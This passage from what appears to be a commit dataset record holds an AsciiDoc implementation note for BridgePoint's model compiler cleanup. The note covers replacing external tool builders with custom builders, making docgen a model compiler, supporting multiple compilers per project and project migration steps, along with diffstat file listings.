src\/org.xtuml.bp.mc.systemc.source\/.externalToolBuilders\/Build.launch | 15 -----\n src\/org.xtuml.bp.mc.systemc.source\/.externalToolBuilders\/Clean.launch | 10 ---\n src\/org.xtuml.bp.mc.systemc.source\/.gitignore | 2 -\n src\/org.xtuml.bp.mc.systemc.source\/.project | 48 --------------\n src\/org.xtuml.bp.mc.systemc.source\/.settings\/org.eclipse.jdt.core.prefs | 7 --\n src\/org.xtuml.bp.mc.systemc.source\/META-INF\/MANIFEST.MF | 24 -------\n src\/org.xtuml.bp.mc.systemc.source\/about.html | 36 -----------\n src\/org.xtuml.bp.mc.systemc.source\/build.properties | 12 ----\n src\/org.xtuml.bp.mc.systemc.source\/build_settings\/build_setting.properties | 9 ---\n src\/org.xtuml.bp.mc.systemc.source\/defaults\/launch_specification\/Model Compiler.launch | 11 ----\n src\/org.xtuml.bp.mc.systemc.source\/generate.xml | 29 ---------\n src\/org.xtuml.bp.mc.systemc.source\/plugin.xml | 53 ---------------\n src\/org.xtuml.bp.mc.systemc.source\/pom.xml | 47 --------------\n src\/org.xtuml.bp.mc.systemc.source\/src\/org\/xtuml\/bp\/mc\/systemc\/source\/Activator.java | 68 --------------------\n src\/org.xtuml.bp.mc.systemc.source\/src\/org\/xtuml\/bp\/mc\/systemc\/source\/ExportBuilder.java | 25 --------\n src\/org.xtuml.bp.mc.systemc.source\/src\/org\/xtuml\/bp\/mc\/systemc\/source\/MCNature.java | 50 ---------------\n src\/org.xtuml.bp.mc.systemc.source\/src\/org\/xtuml\/bp\/mc\/systemc\/source\/MCNewProjectWizard.java | 63 ------------------\n src\/org.xtuml.bp.mc.template\/.classpath | 7 --\n src\/org.xtuml.bp.mc.template\/.externalToolBuilders\/Build.launch | 15 -----\n src\/org.xtuml.bp.mc.template\/.externalToolBuilders\/Clean.launch | 10 ---\n src\/org.xtuml.bp.mc.template\/.gitignore | 1 -\n src\/org.xtuml.bp.mc.template\/.project | 48 --------------\n src\/org.xtuml.bp.mc.template\/META-INF\/MANIFEST.MF | 14 ----\n src\/org.xtuml.bp.mc.template\/Readme.txt | 1 -\n src\/org.xtuml.bp.mc.template\/about.html | 36 -----------\n src\/org.xtuml.bp.mc.template\/build.properties | 8 ---\n src\/org.xtuml.bp.mc.template\/icons\/newexprj_wiz.gif | Bin 607 -> 0 bytes\n src\/org.xtuml.bp.mc.template\/plugin.xml | 25 --------\n src\/org.xtuml.bp.mc.template\/pom.xml | 47 --------------\n src\/org.xtuml.bp.mc.template\/src\/org\/xtuml\/bp\/mc\/template\/Activator.java | 50 ---------------\n src\/org.xtuml.bp.mc.template\/src\/org\/xtuml\/bp\/mc\/template\/ModelCompilerSection.java | 216 --------------------------------------------------------------\n src\/org.xtuml.bp.mc.template\/src\/org\/xtuml\/bp\/mc\/template\/ModelCompilerTemplateWizard.java | 36 -----------\n src\/org.xtuml.bp.mc.template\/templates\/model_compiler\/.settings\/org.eclipse.jdt.core.prefs | 8 ---\n src\/org.xtuml.bp.mc.template\/templates\/model_compiler\/build_settings\/build_setting.properties | 9 ---\n src\/org.xtuml.bp.mc.template\/templates\/model_compiler\/defaults\/launch_specification\/Model Compiler.launch | 11 ----\n src\/org.xtuml.bp.mc.template\/templates\/model_compiler\/generate.xml | 29 ---------\n src\/org.xtuml.bp.mc.template\/templates\/model_compiler\/java\/Activator.java | 68 --------------------\n src\/org.xtuml.bp.mc.template\/templates\/model_compiler\/java\/ExportBuilder.java | 25 --------\n src\/org.xtuml.bp.mc.template\/templates\/model_compiler\/java\/MCNature.java | 49 --------------\n src\/org.xtuml.bp.mc.template\/templates\/model_compiler\/java\/MCNewProjectWizard.java | 65 -------------------\n src\/org.xtuml.bp.mc\/.settings\/org.eclipse.jdt.core.prefs | 6 +-\n src\/org.xtuml.bp.mc\/META-INF\/MANIFEST.MF | 8 +--\n src\/org.xtuml.bp.mc\/build.properties | 2 +-\n src\/org.xtuml.bp.mc\/plugin.xml | 120 +++++++++++++++++-----------------\n src\/org.xtuml.bp.mc\/src\/org\/xtuml\/bp\/mc\/AbstractActivator.java | 47 --------------\n src\/org.xtuml.bp.mc\/src\/org\/xtuml\/bp\/mc\/AbstractExportBuilder.java | 22 +++----\n src\/org.xtuml.bp.mc\/src\/org\/xtuml\/bp\/mc\/AbstractNature.java | 215 ++++---------------------------------------------------------\n src\/org.xtuml.bp.mc\/src\/org\/xtuml\/bp\/mc\/AbstractNewProjectWizard.java | 88 -------------------------\n src\/org.xtuml.bp.mc\/src\/org\/xtuml\/bp\/mc\/AbstractProperties.java | 74 ---------------------\n src\/org.xtuml.bp.mc\/src\/org\/xtuml\/bp\/mc\/MCBuilderArgumentHandler.java | 155 --------------------------------------------\n src\/org.xtuml.bp.mc\/src\/org\/xtuml\/bp\/mc\/PreBuilder.java | 34 ++++++++++\n src\/org.xtuml.bp.mc\/src\/org\/xtuml\/bp\/mc\/tools\/SwitchProjectModelCompilerAction.java | 17 ++---\n src\/org.xtuml.bp.mc\/src\/org\/xtuml\/bp\/mc\/tools\/SwitchProjectModelCompilerWizard.java | 140 +++++++++++++++++++++++-----------------\n src\/org.xtuml.bp.mc\/src\/org\/xtuml\/bp\/mc\/utilities\/ModelCompilerConsoleManager.java | 69 ++++++++++++++++++++\n src\/org.xtuml.bp.mc\/src\/org\/xtuml\/bp\/mc\/utilities\/ProcessUtil.java | 63 ++++++++++++++++++\n src\/org.xtuml.bp.pkg-feature\/feature.xml | 38 +----------\n src\/org.xtuml.bp.ui.canvas\/.project | 3 +-\n src\/org.xtuml.bp.ui.marking\/.project | 5 +-\n src\/org.xtuml.bp.welcome\/META-INF\/MANIFEST.MF | 1 -\n utilities\/build\/configure_build_process.sh | 4 +-\n utilities\/build\/configure_external_dependencies.sh | 12 ++--\n utilities\/build\/preferences\/org.eclipse.core.resources.prefs | 2 +-\n 330 files changed, 4486 insertions(+), 7473 deletions(-)\n----\n\n- fork\/repository: leviathan747\/bptest\n- branch: 11491_mcs\n\n----\n releng\/org.xtuml.bp.releng.parent.tests\/pom.xml | 1 -\n src\/org.xtuml.bp.core.test\/.project | 3 ++-\n src\/org.xtuml.bp.core.test\/src\/org\/xtuml\/bp\/core\/test\/NumberingTestGenerics.java | 2 ++\n src\/org.xtuml.bp.core.test\/src\/org\/xtuml\/bp\/core\/test\/TigerNatureTestGenerics.java | 2 --\n src\/org.xtuml.bp.core.test\/src\/org\/xtuml\/bp\/core\/test\/deployments\/DeploymentExportTests.java | 4 ++--\n src\/org.xtuml.bp.ui.canvas.test\/META-INF\/MANIFEST.MF | 1 -\n src\/org.xtuml.bp.welcome.test\/Test_Readme.txt | 1 -\n src\/org.xtuml.internal.test\/.classpath | 7 -------\n src\/org.xtuml.internal.test\/.externalToolBuilders\/Build.launch | 14 --------------\n src\/org.xtuml.internal.test\/.externalToolBuilders\/Clean.launch | 10 ----------\n src\/org.xtuml.internal.test\/.gitignore | 3 ---\n src\/org.xtuml.internal.test\/.project | 48 ------------------------------------------------\n src\/org.xtuml.internal.test\/META-INF\/MANIFEST.MF | 15 ---------------\n src\/org.xtuml.internal.test\/build.properties | 5 -----\n src\/org.xtuml.internal.test\/plugin.xml | 30 ------------------------------\n src\/org.xtuml.internal.test\/pom.xml | 16 ----------------\n src\/org.xtuml.internal.test\/src\/org\/xtuml\/internal\/test\/NewCBTestWizard1.java | 97 -------------------------------------------------------------------------------------------------\n src\/org.xtuml.internal.test\/src\/org\/xtuml\/internal\/test\/NewCBTestWizard2.java | 179 -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n src\/org.xtuml.internal.test\/src\/org\/xtuml\/internal\/test\/NewMCTestWizard1.java | 108 ------------------------------------------------------------------------------------------------------------\n src\/org.xtuml.internal.test\/src\/org\/xtuml\/internal\/test\/NewMCTestWizard2.java | 99 ---------------------------------------------------------------------------------------------------\n src\/org.xtuml.internal.test\/src\/org\/xtuml\/internal\/test\/TestPlugin.java | 92 --------------------------------------------------------------------------------------------\n src\/org.xtuml.internal.test\/src\/org\/xtuml\/internal\/test\/WizardCodeBuilderChooserPage.java | 111 ---------------------------------------------------------------------------------------------------------------\n 22 files changed, 6 insertions(+), 842 deletions(-)\n----\n\n- fork\/repository: leviathan747\/mc\n- branch: 11491_mcs\n\n----\n model\/docgen\/.cproject | 120 ---------------------------------------------------------------------------------------\n model\/docgen\/.externalToolBuilders\/Model Compiler.launch | 15 -----------\n model\/docgen\/.externalToolBuilders\/org.eclipse.cdt.managedbuilder.core.ScannerConfigBuilder (2).launch | 7 ------\n model\/docgen\/.externalToolBuilders\/org.eclipse.cdt.managedbuilder.core.genmakebuilder (2).launch | 7 ------\n model\/docgen\/.project | 38 ++--------------------------\n model\/document\/.cproject | 120 ---------------------------------------------------------------------------------------\n model\/document\/.externalToolBuilders\/Model Compiler.launch | 10 --------\n model\/document\/.project | 33 ------------------------\n model\/document\/.settings\/com.mentor.nucleus.bp.ui.project.preferences.prefs | 2 +-\n model\/document\/gen\/domain.mark | 218 --------------------------------------------------------------------------------------------------------------------------------------------------------------\n model\/document\/gen\/system.mark | 256 ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n model\/escher\/.classpath | 8 ------\n model\/escher\/.externalToolBuilders\/Model Compiler.launch | 16 ------------\n model\/escher\/.options | 13 ----------\n model\/escher\/.project | 15 ++---------\n model\/escher\/.template | 4 ---\n model\/escher\/META-INF\/MANIFEST.MF | 11 --------\n model\/escher\/about.html | 36 ---------------------------\n model\/escher\/build.properties | 11 --------\n model\/escher\/plugin.properties | 10 --------\n model\/integrity\/.cproject | 78 ---------------------------------------------------------\n model\/integrity\/.externalToolBuilders\/Model Compiler.launch | 14 -----------\n model\/integrity\/.externalToolBuilders\/org.eclipse.cdt.managedbuilder.core.ScannerConfigBuilder (3).launch | 7 ------\n model\/integrity\/.externalToolBuilders\/org.eclipse.cdt.managedbuilder.core.genmakebuilder (3).launch | 7 ------\n model\/integrity\/.project | 37 ++-------------------------\n model\/masl\/.cproject | 120 ---------------------------------------------------------------------------------------\n model\/masl\/.externalToolBuilders\/Model Compiler.launch | 14 -----------\n model\/masl\/.externalToolBuilders\/org.eclipse.cdt.managedbuilder.core.ScannerConfigBuilder (1).launch | 7 ------\n model\/masl\/.externalToolBuilders\/org.eclipse.cdt.managedbuilder.core.genmakebuilder (1).launch | 7 ------\n model\/masl\/.project | 38 ++--------------------------\n model\/maslin\/.cproject | 120 ---------------------------------------------------------------------------------------\n model\/maslin\/.externalToolBuilders\/Model Compiler.launch | 14 -----------\n model\/maslin\/.externalToolBuilders\/org.eclipse.cdt.managedbuilder.core.ScannerConfigBuilder (3).launch | 7 ------\n model\/maslin\/.externalToolBuilders\/org.eclipse.cdt.managedbuilder.core.genmakebuilder (3).launch | 7 ------\n model\/maslin\/.project | 38 ++--------------------------\n model\/maslout\/.externalToolBuilders\/Model Compiler.launch | 16 ------------\n model\/maslout\/.project | 14 ++---------\n model\/mcooa\/.cproject | 120 ---------------------------------------------------------------------------------------\n model\/mcooa\/.externalToolBuilders\/Model Compiler.launch | 14 -----------\n model\/mcooa\/.externalToolBuilders\/org.eclipse.cdt.managedbuilder.core.ScannerConfigBuilder.launch | 7 ------\n model\/mcooa\/.externalToolBuilders\/org.eclipse.cdt.managedbuilder.core.genmakebuilder.launch | 7 ------\n model\/mcooa\/.project | 42 -------------------------------\n model\/mcooa\/.settings\/com.mentor.nucleus.bp.ui.project.preferences.prefs | 4 ---\n model\/mcooa\/src\/readme.txt | 1 -\n model\/mcshared\/.cproject | 120 ---------------------------------------------------------------------------------------\n model\/mcshared\/.externalToolBuilders\/Model Compiler.launch | 14 -----------\n model\/mcshared\/.externalToolBuilders\/org.eclipse.cdt.managedbuilder.core.ScannerConfigBuilder (1).launch | 7 ------\n model\/mcshared\/.externalToolBuilders\/org.eclipse.cdt.managedbuilder.core.genmakebuilder (1).launch | 7 ------\n model\/mcshared\/.project | 47 ----------------------------------\n model\/mcshared\/src\/.gitignore | 3 ---\n 50 files changed, 13 insertions(+), 1875 deletions(-)\n----\n\n== 9 Document References\n\n. [[dr-1]] https:\/\/support.onefact.net\/issues\/11491[11491 - Clean up model compiler projects]\n. [[dr-2]] https:\/\/support.onefact.net\/issues\/10345[10345 - update unit tests as needed to account for the move to Eclipse Oxygen]\n. [[dr-3]] https:\/\/support.onefact.net\/issues\/11636[11636 - Update build server with new host version of BP]\n. [[dr-4]] https:\/\/support.onefact.net\/issues\/11637[11637 - Upgrade welcome plugin projects]\n. [[dr-5]] https:\/\/github.com\/xtuml\/graveyard\/tree\/master\/internal\/Documentation_archive\/20121102\/technical\/notes\/dts0100782775[Documentation associated with the introduction of the model compilers]\n. [[dr-6]] https:\/\/support.onefact.net\/issues\/11638[11638 - Create a generic RSL model compiler]\n. [[dr-7]] https:\/\/support.onefact.net\/issues\/11640[11640 - Update CLI to run truely headless]\n. [[dr-8]] https:\/\/support.onefact.net\/issues\/11639[11639 - Reintroduce a model compiler template plugin]\n\n---\n\nThis work is licensed under the Creative Commons CC0 License\n\n---\n","old_contents":"= Clean up model compiler projects\n\nxtUML Project Implementation Note\n\n== 1 Abstract\n\nThe model compiler plugins need a refresh. This implementation documents cleanup\nitems handled as part of this work.\n\n== 2 Introduction and Background\n\n2.1 Background\n\nThe model compilers were first introduced as an external tool builder. An\nexternal tool builder is a flexible mechanism provided by Eclipse to execute\nprograms outside Eclipse during a build. Plugins were created to configure\nthese builders on project creation and assure that they remain up to date. This\ndesign was made without a full understanding of the Eclipse build platform as\nthere is no reason to use an external tool builder when the model compiler is\nitself shipped with the project. It creates messy files in the application\ndirectory in version control and does not provide much configuration\nflexibility. A custom builder provided by the model compiler plugin would be\nbetter.\n\nMore information about the introduction of multiple model compilers in\nBridgePoint can be found at <<dr-5>>.\n\nDocgen is another model compiler provided by BridgePoint, however it was not\nimplemented as a builder or external builder but through a context menu item.\nDocgen is logically a model compiler and it would simplify the interface to\npackage it as just another model compiler.\n\n2.2 Current model compiler flow\n\nCurrently, model compilers are invoked as two separate builders. First a builder\ncalled \"Model Compiler Pre-Build\" runs. This is a customized model export which\ninvokes the OAL parser, sets up the build space, collects all referred to data,\nremoves proxies and graphical instances and outputs one `.sql` file in the\n`code_generation` folder. In some cases pre-builder does not parse OAL (e.g.\nMASL export) and sometimes it does not run at all (if the OAL is fully parsed\nand no files in `models\/` are newer than the output file in `code_generation`).\nNext, an external tool builder gets invoked which points to the `xtumlmc_build`\nPerl script packaged with BridgePoint.\n\n== 3 Requirements\n\n3.1 Model compilers shall stop using external tool builders\n\n3.2 Docgen shall be implemented as a model compiler\n\n3.3 BridgePoint shall support multiple model compilers on a single project\n\n3.4 Project preferences shall be moved to the \"Properties\" menu\n\n== 4 Work Required\n\n4.1 Updating model compiler builders\n\nWith a move toward real builders, there is no longer any need for a separate\nbuilder for the pre-build process. Instead, model compiler builders inherit from\nthe `AbstractExportBuilder` class which provides the pre-build functionality.\nThe first step for any model compiler builder is to execute the `preBuild`\nmethod. For some builders (like the MASL builder) a parameter is passed to\nensure that no OAL is parsed during pre-build. Note that since pre-build is\ninherited behavior for every model compiler it will run first in every model\ncompiler in the build chain, however it still does all the checks to see if a\nrun is necessary. If multiple model compilers are enabled on a single project,\nit is likely that in the second model compiler pre-build that nothing will occur\nbecause pre-build was handled in the first model compiler pre-build.\n\nTake an example where docgen and MC-3020 are enabled on a project. If MC-3020 is\nfirst in the build chain, it will execute a pre-build, generate code and exit.\nNext docgen will invoke a pre-build but will see that no source files are newer\nthan the existing pre-build output and short circuit. The docgen builder will\nthen run and exit. On the other hand, if docgen runs first, pre-build will\nexecute (skipping OAL parse) and docgen will execute and then exit. Next MC-3020\npre-build will run and notice that the model is not parsed. In this case the\npre-build will recreate the output file. Then MC-3020 will generate code and\nexit.\n\nThis design assures that output will _always_ be present when necessary and that\nunnecessary pre-builds are avoided in the majority of cases.\n\n4.1.1 MC-3020\n\nAll of the MC-3020 based model compilers were consolidated into one plugin\ncalled `org.xtuml.bp.mc.mc3020`. The builder was updated to remove the\nfunctionality which sets up and invokes the external tool builder. Instead a new\nbuilder `Mc3020Builder` was introduced which first runs pre-builder, then\ninvokes `xtumlmc_build` and handles all of the input and output. The string\nidentifiers for the MC nature and builder have been changed. Legacy projects\nwith the old identifiers will need to be upgraded. See <<5 Implementation\nComments>> for more information.\n\n4.1.1.1 Preferences\n\nA new preferences page was added for projects configured with the MC-3020\nnature. The target language for MC-3020 can be configured. The default is C.\n\nimage::mc3020_prefs.png[mc3020_prefs.png,width=75%]\n\n4.1.1.2 CDT for MC-3020 projects\n\nDuring creation of an MC-3020 project or setting of model compilers, the\npreferences in the previous section can be set. Additionally, the project can\nbe converted to a C\/C{plus}{plus} project (adds the CDT nature and builders to\nthe project). The default for this option is unchecked. MC-3020 many times is\nused just for code generation and other C\/C{plus}{plus} build tools are\nrequired to build the source for the chosen target.\n\nimage::new_mc3020_project.png[new_mc3020_project.png,width=75%]\n\n4.1.1.3 `org.xtuml.bp.cdt` plugin\n\nThere used to be a plugin called `org.xtuml.bp.cdt`. Its only purpose in life\nwas to wait for projects to be created. When a project was created that had one\nof the MC-3020 flavor model compilers set, it automatically set it to a CDT\nproject. This plugin has been completely removed now that the functionality\nstated above is implemented.\n\n4.1.2 MC-Java\n\nThe MC-Java plugin was cleaned up and renamed from `org.xtuml.bp.mc.java.source`\nto simply `org.xtuml.bp.mc.java`. The MC nature and builder names were changed\nand updated in the source projects that use them. MC-Java was removed from the\nlist of available model compilers. It can still be configured manually by\nediting the `.project` file, but it is not used by BridgePoint users other than\nby the BridgePoint project itself, so it only confuses new users.\n\n4.1.3 Docgen\n\nThe `org.xtuml.bp.docgen` plugin was removed. A new plugin\n`org.xtuml.bp.mc.docgen` as introduced following the same pattern as the other\nMC plugins. The behavior found in the `Generator` class in the old docgen plugin\nwas adapted to work as a builder. The \"Create Documentation\" CME associated with\ndocgen is removed and instead it is executed during builds. Docgen is now\navailable in the list of model compilers when creating a new project or setting\nmodel compilers.\n\n4.1.3.1 Preferences\n\nA new preference page was added for projects configured with the docgen nature.\nThe output destination can be configured. The builder can be configured to open\nthe output file when finished. The defaults are the `doc\/` directory and to\nalways open the output. This mirrors current behavior.\n\nimage::docgen_prefs.png[docgen_prefs.png,width=75%]\n\n4.2 Delegating wizards\n\nA mechanism exists for creating new projects and setting model compilers called\n\"delegating wizards.\" The idea is that model compiler plugins can dynamically\ncontribute wizard pages to the new project wizard without re-building\nBridgePoint using an Eclipse extension point. This is very handy if users want\nto develop their own model compiler plugins and access them through the UI.\n\nBefore now, exactly one model compiler must be assigned to each project. This work\nextended the delegating wizard framework such that zero to many model compilers\ncan be assigned to any project. A project could have both docgen and MC-3020 or\na project could simply have no model compilers. With this change the \"None\"\nmodel compiler went away.\n\nimage::mcs.png[mcs.png,width=75%]\n\nOnce one or more model compilers are selected, if they have additional\nconfiguration, those wizard pages are added to the new project wizard.\n\nRead more about delegating wizards at <<dr-5>>.\n\n4.3 Console management\n\nModel compilers now get first class consoles. A utility class\n`ModelCompilerConsoleManager` was added to handle the common functionality of\ndealing with consoles. An output and error stream are opened to the console to\nwhich the `stdout` and `stderr` of the model compiler executables are piped. The\nerror stream prints to the console in red. This class also re-directs the output\nto Eclipse standard out and standard error for CLI builds.\n\n4.4 Project preferences\n\nProject preferences were moved to the \"Properties\" menu of a project. This is\nwhere most Eclipse tools handle project specific preferences but BridgePoint\nprovided its own CME. With this change, BridgePoint is much more like other\nEclispe based tools. The old project preferences CME was removed and the\n\"Properties\" CME was added for model explorer.\n\nimage::project_prefs.png[project_prefs.png,width=75%]\n\nimage::properties_cme.png[properties_cme.png,width=50%]\n\n4.5 General code cleanup\n\nCode was cleaned up where applicable.\n\n4.5.1 `org.xtuml.bp.mc.template`\n\nThe template model compiler plugin was removed. This provided a mechanism to\nquickly create new model compiler plugin projects. It is a good idea but it is\nnot being used and it currently does not work. It may be a future project to\nreintroduce something like the template plugin but for now it is simply\nremoved. Read more about when this was introduced at <<dr-5>>.\n\n4.5.2 `org.xtuml.internal.test`\n\nThe `org.xtuml.internal.test` plugin was removed. This test only had files\nwhich were used to test the old delegating wizard framework with respect to\ncreating new model compiler plugins using the template plugin. The delegating\nwizard framework has been updated and the template plugin has been removed so\nthese tests are deprecated. These tests are not run automatically and have not\nbeen run recently.\n\n4.5.3 BridgePoint CLI\n\nThe CLI plugin had to be updated to properly refer to the new model compiler\nplugins. An attempt was made to overhaul the CLI build so that it would be\nbetter, however there were problems affecting the BridgePoint build and these\nchanges were reverted.\n\n== 5 Implementation Comments\n\n5.1 Future enhancements\n\n5.1.1 RSL builder\n\nA future enhancement that could be made is to implement a generic RSL model\ncompiler. This would essentially just be an interface to `pyrsl`. See <<dr-6>>.\n\n5.1.2 Purely headless CLI build\n\nAs mentioned above, some work was done to make build purely headless. It ran\ninto problems, but there is no real reason this cannot be done. It is faster,\nlighter, and removes the requirement of a virtual frame buffer. See <<dr-7>>.\n\n5.1.3 Template plugin\n\nA new model compiler template plugin could be introduced as mentioned above.\nSee <<dr-8>>.\n\n5.2 Existing project migration\n\nWith this version of BridgePoint, projects currently using a BridgePoint model\ncompiler will need to be upgraded. Since this only affects Eclipse support\nfiles, the decision was made not to implement a migration tool or provide legacy\nsupport for older projects.\n\n5.2.1 Procedure\n\nUse the following procedure to update existing models. It is recommended that\nprojects that are not in revision control be backed up before an upgrade is\nattempted.\n\n. Right click on the project and select \"Properties\"\n. In the \"Builders\" section, select \"Missing builder\n (org.xtuml.bp.mc.*.export_builder)\" and click \"Remove\"\n. In the \"Builders\" section, select \"Missing Compiler\" and click \"Remove\"\n. Click \"Apply and Close\"\n. Right click on the project and select \"BridgePoint Utilities > Set Model\n Compilers\"\n. Follow the wizard to enable your desired model compiler(s)\n\n5.2.2 BridgePoint development projects\n\nThe BridgePoint plugin projects which use MC-Java have been updated to use the\nnew nature and builder identifiers introduced by this work. Therefore,\nBridgePoint must be built with this version of BridgePoint or later. The build\nserver will need to be updated once this work is promoted. <<dr-3>> is raised to\ntrack this upgrade.\n\nThe model compiler projects (MASL tools, docgen, mcmc, etc) have also been\nupgraded to be compatible with this version of BridgePoint. \n\nThe `MicrowaveOven` and `GPS_Watch` projects included with BridgePoint in the\nwelcome plugin will no longer build. <<dr-4>> is raised to track the upgrade of\nthose projects.\n\nOther projects in the `models` repository will need to be upgraded, however this\ncan be done at a later time as needed.\n\n== 6 Unit Test\n\n6.1 Current unit test suite shall pass.\n\n6.1.1 Existing unit tests that are deprecated by this work shall be removed.\n\n6.1.2 Existing unit tests that are still valid but broken by this work shall be\nrepaired.\n\n== 7 User Documentation\n\n7.1 Project preferences\n\nReferences to the project preferences menu item in the documentation have been\nupdated to correctly refer to the \"Properties\" menu. Changes were made in the\n\"Preferences\" documentation, the \"MASL Modeling and Conversion Guide\" page, and\nthe \"BridgePoint Context Menu Tools\" page.\n\n7.2 CME menus\n\nIn addition to the project preferences the following changes have been made to\nthe \"BridgePoint Context Menu Tools\" page.\n\n7.2.1 Create Documenatation has been removed\n\n7.2.2 Set Model Compiler has been changed to \"Set Model Compilers\" and the\ndescription has been updated\n\n== 8 Code Changes\n\n- fork\/repository: leviathan747\/bridgepoint\n- branch: 11491_mcs\n\n----\n TODO once Bob's branch is merged\n----\n\n- fork\/repository: leviathan747\/bptest\n- branch: 11491_mcs\n\n----\n TODO once Bob's branch is merged\n----\n\n- fork\/repository: leviathan747\/mc\n- branch: 11491_mcs\n\n----\n TODO once Bob's branch is merged\n----\n\n== 9 Document References\n\n. [[dr-1]] https:\/\/support.onefact.net\/issues\/11491[11491 - Clean up model compiler projects]\n. [[dr-2]] https:\/\/support.onefact.net\/issues\/10345[10345 - update unit tests as needed to account for the move to Eclipse Oxygen]\n. [[dr-3]] https:\/\/support.onefact.net\/issues\/11636[11636 - Update build server with new host version of BP]\n. [[dr-4]] https:\/\/support.onefact.net\/issues\/11637[11637 - Upgrade welcome plugin projects]\n. [[dr-5]] https:\/\/github.com\/xtuml\/graveyard\/tree\/master\/internal\/Documentation_archive\/20121102\/technical\/notes\/dts0100782775[Documentation associated with the introduction of the model compilers]\n. [[dr-6]] https:\/\/support.onefact.net\/issues\/11638[11638 - Create a generic RSL model compiler]\n. [[dr-7]] https:\/\/support.onefact.net\/issues\/11640[11640 - Update CLI to run truely headless]\n. [[dr-8]] https:\/\/support.onefact.net\/issues\/11639[11639 - Reintroduce a model compiler template plugin]\n\n---\n\nThis work is licensed under the Creative Commons CC0 License\n\n---\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d43417ef47f69089ac054ea30ec75dae4584d2bc","subject":"Docs: Deleted redundant word in scripting","message":"Docs: Deleted redundant word in scripting\n","repos":"s1monw\/elasticsearch,glefloch\/elasticsearch,fernandozhu\/elasticsearch,umeshdangat\/elasticsearch,nilabhsagar\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,geidies\/elasticsearch,lks21c\/elasticsearch,glefloch\/elasticsearch,brandonkearby\/elasticsearch,coding0011\/elasticsearch,s1monw\/elasticsearch,i-am-Nathan\/elasticsearch,winstonewert\/elasticsearch,brandonkearby\/elasticsearch,njlawton\/elasticsearch,nezirus\/elasticsearch,gingerwizard\/elasticsearch,winstonewert\/elasticsearch,robin13\/elasticsearch,mohit\/elasticsearch,Shepard1212\/elasticsearch,pozhidaevak\/elasticsearch,MisterAndersen\/elasticsearch,GlenRSmith\/elasticsearch,fred84\/elasticsearch,rlugojr\/elasticsearch,scottsom\/elasticsearch,Stacey-Gammon\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,markwalkom\/elasticsearch,scottsom\/elasticsearch,fred84\/elasticsearch,uschindler\/elasticsearch,jprante\/elasticsearch,mjason3\/elasticsearch,shreejay\/elasticsearch,MisterAndersen\/elasticsearch,brandonkearby\/elasticsearch,maddin2016\/elasticsearch,jimczi\/elasticsearch,C-Bish\/elasticsearch,s1monw\/elasticsearch,artnowo\/elasticsearch,masaruh\/elasticsearch,nilabhsagar\/elasticsearch,kalimatas\/elasticsearch,fernandozhu\/elasticsearch,GlenRSmith\/elasticsearch,mjason3\/elasticsearch,markwalkom\/elasticsearch,brandonkearby\/elasticsearch,i-am-Nathan\/elasticsearch,LeoYao\/elasticsearch,MisterAndersen\/elasticsearch,LeoYao\/elasticsearch,Helen-Zhao\/elasticsearch,nknize\/elasticsearch,LeoYao\/elasticsearch,LewayneNaidoo\/elasticsearch,lks21c\/elasticsearch,kalimatas\/elasticsearch,masaruh\/elasticsearch,IanvsPoplicola\/elasticsearch,Stacey-Gammon\/elasticsearch,uschindler\/elasticsearch,alexshadow007\/elasticsearch,qwerty4030\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,ZTE-PaaS\/elasticsearch,jprante\/elasticsearch,rajanm\/elasticsearch,robin13\/elasticsearch,LeoYao\/elasticsearch,jimczi\/elasticsearch,fernandozhu\/elasticsearch,vroyer\/elassandra,wangtuo\/elasticsearch,GlenRSmith\/elasticsearch,qwerty4030\/elasticsearch,elasticdog\/elasticsearch,njlawton\/elasticsearch,rajanm\/elasticsearch,LeoYao\/elasticsearch,jprante\/elasticsearch,wenpos\/elasticsearch,JSCooke\/elasticsearch,umeshdangat\/elasticsearch,alexshadow007\/elasticsearch,gfyoung\/elasticsearch,StefanGor\/elasticsearch,artnowo\/elasticsearch,LewayneNaidoo\/elasticsearch,gfyoung\/elasticsearch,Helen-Zhao\/elasticsearch,geidies\/elasticsearch,ZTE-PaaS\/elasticsearch,uschindler\/elasticsearch,brandonkearby\/elasticsearch,mortonsykes\/elasticsearch,MisterAndersen\/elasticsearch,Stacey-Gammon\/elasticsearch,nezirus\/elasticsearch,wangtuo\/elasticsearch,masaruh\/elasticsearch,glefloch\/elasticsearch,maddin2016\/elasticsearch,jprante\/elasticsearch,JSCooke\/elasticsearch,Helen-Zhao\/elasticsearch,glefloch\/elasticsearch,obourgain\/elasticsearch,rlugojr\/elasticsearch,i-am-Nathan\/elasticsearch,a2lin\/elasticsearch,nazarewk\/elasticsearch,a2lin\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,elasticdog\/elasticsearch,artnowo\/elasticsearch,mjason3\/elasticsearch,njlawton\/elasticsearch,lks21c\/elasticsearch,i-am-Nathan\/elasticsearch,njlawton\/elasticsearch,winstonewert\/elasticsearch,rajanm\/elasticsearch,artnowo\/elasticsearch,alexshadow007\/elasticsearch,LewayneNaidoo\/elasticsearch,LewayneNaidoo\/elasticsearch,StefanGor\/elasticsearch,gingerwizard\/elasticsearch,JSCooke\/elasticsearch,LeoYao\/elasticsearch,bawse\/elasticsearch,JSCooke\/elasticsearch,naveenhooda2000\/elasticsearch,winstonewert\/elasticsearch,Shepard1212\/elasticsearch,gingerwizard\/elasticsearch,obourgain\/elasticsearch,strapdata\/elassandra,gfyoung\/elasticsearch,pozhidaevak\/elasticsearch,markwalkom\/elasticsearch,sneivandt\/elasticsearch,obourgain\/elasticsearch,nilabhsagar\/elasticsearch,sneivandt\/elasticsearch,StefanGor\/elasticsearch,shreejay\/elasticsearch,kalimatas\/elasticsearch,C-Bish\/elasticsearch,robin13\/elasticsearch,JackyMai\/elasticsearch,StefanGor\/elasticsearch,lks21c\/elasticsearch,shreejay\/elasticsearch,naveenhooda2000\/elasticsearch,bawse\/elasticsearch,njlawton\/elasticsearch,gingerwizard\/elasticsearch,qwerty4030\/elasticsearch,fernandozhu\/elasticsearch,mikemccand\/elasticsearch,Shepard1212\/elasticsearch,pozhidaevak\/elasticsearch,shreejay\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,strapdata\/elassandra,vroyer\/elasticassandra,nezirus\/elasticsearch,vroyer\/elasticassandra,fred84\/elasticsearch,bawse\/elasticsearch,s1monw\/e